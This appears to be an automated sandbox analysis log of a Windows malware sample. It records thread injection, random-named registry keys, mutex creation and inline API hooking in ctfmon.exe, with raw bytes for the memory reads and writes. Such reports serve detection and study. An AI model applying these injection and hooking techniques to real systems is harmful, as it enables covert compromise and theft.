Thread created PID: 2152 TID: 2676 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\cmd.exe Injected: true success or wait 2818545026
System info queried Type: ProcessInformation success or wait 2819618782
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2819655991
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 2940000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2819689263
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 2940000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2819719903
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2819736274
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: F40000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2820146962
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: F40000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2820192617
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2820197867
Thread created PID: 1520 TID: 2716 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2820658560
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and read Type: commit Baseaddress: 2940000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2820949108
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and read Type: commit Baseaddress: 2940000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2820957997
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 2feg2i1d Type: String Data: zohWpch3LqGxszKm success or wait 2827379944
System info queried Type: ProcessInformation success or wait 2827587134
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2827614966
Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 28C0000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 2828483674
Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 28C0000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 2828522822
Section loaded Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 28C0000 Size: 159744 Protection: execute Mapped to pid: own pid success or wait 2828538930
Thread created PID: 1520 TID: 2808 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2830129219
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: ghhe0d4 object name not found 2830153114
System info queried Type: ProcessInformation success or wait 2830280785
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2830304612
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-215D-B06D3016937F} success or wait 2830382152
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-6D5C-B06D7C17937F} success or wait 2830408524
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-055F-B06D1414937F} success or wait 2830435511
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-455F-B06D5414937F} success or wait 2830471271
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-8D5F-B06D9C14937F} success or wait 2830492060
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-915F-B06D8014937F} success or wait 2830499767
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-595E-B06D4815937F} success or wait 2830507947
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-F15E-B06DE015937F} success or wait 2830508925
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-0959-B06D1812937F} success or wait 2830537443
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-4D59-B06D5C12937F} success or wait 2830542467
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D159-B06DC012937F} success or wait 2830547630
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5B-B06DBC10937F} success or wait 2830556695
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-DD5D-B06DCC16937F} success or wait 2830561719
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-AD5C-B06DBC17937F} success or wait 2830567145
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-D95B-B06DC810937F} object name exists 2830572129
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-615A-B06D7011937F} object name exists 2830577353
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-7D5A-B06D6C11937F} success or wait 2830582258
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-555B-B06D4410937F} success or wait 2830593093
Mutant created Name: \BaseNamedObjects\Global\{A4D26BAA-D5D6-1537-E15B-B06DF010937F} object name exists 2830598813
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2832321887
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 618 HWNDs: 1006a, 3012e, 300a8, 30088, 1006e, 10084, 10068, 1006c, 30056, 70100, 3f0110, 7010c, 7004c, 300a4, 30094 success or wait 2832825705
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 618 HWNDs: 1006a, 3012e, 300a8, 30088, 1006e, 10084, 10068, 1006c, 30056, 70100, 3f0110, 7010c, 7004c, 300a4, 30094 success or wait 2832826301
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2835140831
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: F40000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2835201999
Analysis File: ctfmon.exe PID: 1788 Parent PID: 488
+ Sections
+ General
Start time: 05:44:43
Start date: 08/12/2011
Path: C:\WINDOWS\system32\ctfmon.exe
Commandline: C:\WINDOWS\system32\ctfmon.exe
Imagebase: 0x400000
File size: 15360 bytes
MD5 hash: 5F1D5F88303D4A4DBC8E5F97BA967CC3
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 112A4FF
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
unknown query and write and read commit B10000 12288 own pid read write success or wait 1
unknown query and write and read commit B10000 12288 own pid read write success or wait 1
unknown query and write and read commit B10000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown F40000 4096 own pid readonly object name not found 1 1124018
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 1124018
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 1124018
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 1124018
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1 1124018
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1 1124018
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1 1124018
C:\WINDOWS\system32\wininet.dll read commit 1250000 667648 own pid readonly success or wait 1 1124018
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1 1124018
Registry Activities:
+ Key value replaced with new
Key Path Name Type Old Data New Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 Binary C5 D1 56 A5 C4 D1 56 A5 success or wait 1 1115F0A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 1115EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 1115EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 1115FBA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 1115EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1406 success or wait 5 1115EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1609 success or wait 5 1115EB7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 success or wait 1 1115F47
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir 15807505 success or wait 1 1115F7A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} object name exists 1 112A811
\BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} object name exists 1 112A811
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 1 1130DFC
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
1284 1788 7C8106F9 false C:\WINDOWS\system32\ctfmon.exe success or wait 1 1128106
440 1788 7C8106F9 false C:\WINDOWS\system32\ctfmon.exe success or wait 1 1128106
1980 1788 7C8106F9 false C:\WINDOWS\system32\ctfmon.exe success or wait 1 1128106
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1788 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 112F078
1788 C:\WINDOWS\system32\ctfmon.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 112F078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1788 C:\WINDOWS\system32\ctfmon.exe A50000 10 B8 35 00 00 00 E9 A9 D1 EB 7B success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 5 E9 A4 AE 81 84 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5000A 10 68 6C 02 00 00 E9 1E 63 EC 7B success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 7C91632D 5 E9 09 1F 81 84 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50014 10 8B FF 55 8B EC E9 A3 2E 7C 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 77212EBC 5 E9 FD 4B F0 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5001E 10 8B FF 55 8B EC E9 7E 60 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771C60A1 5 E9 6F 1A F5 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50028 10 8B FF 55 8B EC E9 94 E9 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771CE9C1 5 E9 A6 91 F4 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50032 10 8B FF 55 8B EC E9 8A 2F 7C 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 77212FC1 5 E9 4B 4C F0 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5003C 10 8B FF 55 8B EC E9 4B 4D 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771C4D8C 5 E9 25 2F F5 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50046 10 8B FF 55 8B EC E9 9F 82 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771C82EA 5 E9 0A FA F4 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50050 10 8B FF 55 8B EC E9 AB 90 7A 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771F9100 5 E9 34 EC F1 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5005A 10 8B FF 55 8B EC E9 98 89 78 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771D89F7 5 E9 8B F3 F3 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50064 12 6A 2C 68 10 7B 1C 77 E9 59 79 77 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771C79C2 5 E9 F0 03 F5 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50070 10 8B FF 55 8B EC E9 DE 9B 7A 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771F9C53 5 E9 B4 E1 F1 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5007A 10 8B FF 55 8B EC E9 E5 8F 78 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771D9064 5 E9 BB ED F3 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A50084 10 8B FF 55 8B EC E9 4F B1 76 76 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 771BB1D8 5 E9 5F CC F5 89 success or wait 1 112F11A
1788 C:\WINDOWS\system32\ctfmon.exe A5008E 10 8B FF 55 8B EC E9 98 3D 06 71 success or wait 1 112F0EC
1788 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 5 E9 3E E9 66 8F success or wait 1 112F11A
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1788 C:\WINDOWS\system32\ctfmon.exe 1250000 124F8C8 page read and write success or wait 1 112A5EB
1788 C:\WINDOWS\system32\ctfmon.exe 1250000 124F8CC page read and write success or wait 1 112A5EB
1788 C:\WINDOWS\system32\ctfmon.exe A50000 124F4C0 page execute and read and write success or wait 1 1133FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1788 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771F9C53 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771D9064 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771D9064 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 771BB1D8 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 771BB1D8 1000 page execute read page execute and read and write success or wait 1 112F134
1788 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 1000 page execute and read and write page execute read success or wait 1 112F04F
1788 C:\WINDOWS\system32\ctfmon.exe 71AB3E2B 1000 page execute read page execute and read and write success or wait 1 112F134
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 3 1138879
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: F40000 Size: 4096 Protection: readonly Mapped to pid: own pid object name not found 2638885055
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2638886634
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2638936691
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2638944664
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2638968844
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2638980201
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2639008323
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 1250000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2639025199
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2639093040
Memory allocated PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1250000 Length: 124F8C8 Allocation Type: null Protection: page read and write success or wait 2639143494
Memory allocated PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 1250000 Length: 124F8CC Allocation Type: null Protection: page read and write success or wait 2639144556
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2639608703
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2639611685
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2639612178
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2639612691
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2639613332
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639613890
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639614372
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639614949
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639615433
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639615923
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639616673
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639617160
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639617641
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2639618132
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2639618613
Memory allocated PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: A50000 Length: 124F4C0 Allocation Type: null Protection: page execute and read and write success or wait 2639619442
Memory attributes changed PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2639621017
Memory read PID: 1788 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2639621313
